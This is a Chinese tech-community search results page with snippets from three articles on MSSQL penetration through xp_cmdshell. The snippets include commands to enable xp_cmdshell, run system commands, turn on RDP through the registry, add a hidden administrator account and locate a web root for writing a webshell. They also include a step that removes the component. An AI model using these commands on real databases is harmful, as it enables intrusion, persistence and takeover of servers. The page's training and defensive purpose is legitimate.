首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    数据库安全之MSSQL渗透

    进行提权 xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后默认禁止,但未删除 0x01 xp_cmdshell简介 xp``_cmdshell是Sql Server中的一个组件...通常在拿到sa口令之后,可以通过xp``_cmdshell来进行提权 影响范围: 只要该数据库存在该组件,就可以利用 0x02 xp_cmdshell使用 1)查看xp_cmdshell状态 select...)利用xp_cmdshell执行命令 执行系统命令 以下几条命令格式都可以用于执行系统命令 exec xp_cmdshell "whoami"master..xp_cmdshell 'whoami...保护措施 将该xp_cmdshell存储过程删除即可 exec sp_dropextendedproc 'xp_cmdshell' 被删除后,重新添加xp``_cmdshell存储过程语句 EXEC...', 'xpsql70.dll'; 若想彻底删除xp_cmdshell扩展存储过程,建议在C盘里直接搜索xplog70.dll,然后删除xp_cmdshell

    6.3K10

    CISP-PTE经典靶场解析(超详细)

    进行提权 sql sever有一个自带的系统数据库master,而xp_cmdshell在 存储过程、扩展存储过程中,查看扩展存储过程,如果其中含有sys.xp_cmdshell 说明目标网站没有删除该组件...选择数据库,新建查询,执行命令 EXEC master.dbo.xp_cmdshell 'whoam' 成功提权 注意:如果执行命令如果报错提示关闭,那么就使用开启 xp_cmdshell 的命令(...只有sa权限才可以开启) EXEC sp_configure 'show advanced options', 1 RECONFIGURE; EXEC sp_configure 'xp_cmdshell...Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f' 检查端口状态 EXEC master.dbo.xp_cmdshell 'netstat -an...|find "3389"' 添加影子用户,并加入管理员组 EXEC master.dbo.xp_cmdshell 'net user test$ 123456 /add' EXEC master.dbo.xp_cmdshell

    34710

    经验分享 | mssql注入实战总结之狠快准绕

    ---- 实战一 这是一次挖到一个小OA系统的通用管理员弱口令,后台可以执行sql语句并且是sa权限,这运气没谁了哈哈 但可以去edu刷分的大部分目标xp_cmdshell却废了.只能恰个弱口令……....先说可以xp_cmdshell部分: xp_cmdshell写shell技巧: 条件:sa权限, 常见问题:xp_cmdshell存储过程在 SQL Server 2005以后默认关闭,需要手动开启...”, 1’) #将xp_cmdshell的值设置为1 execute(‘reconfigure’) #保存设置...写shell技巧: #先找网站根路径: exec xp_cmdshell ‘where /r d:\ *.aspx’; 直接写入aspx文件同目录却访问不了,麻了!...其它gethell大全:(看偶像柯大佬的总结) 剩下不可以xp_cmdshell的,但其它大多getshell方法(这里可以看柯大佬的珂技知识分享的总结),都没法用.

    1.6K10
    领券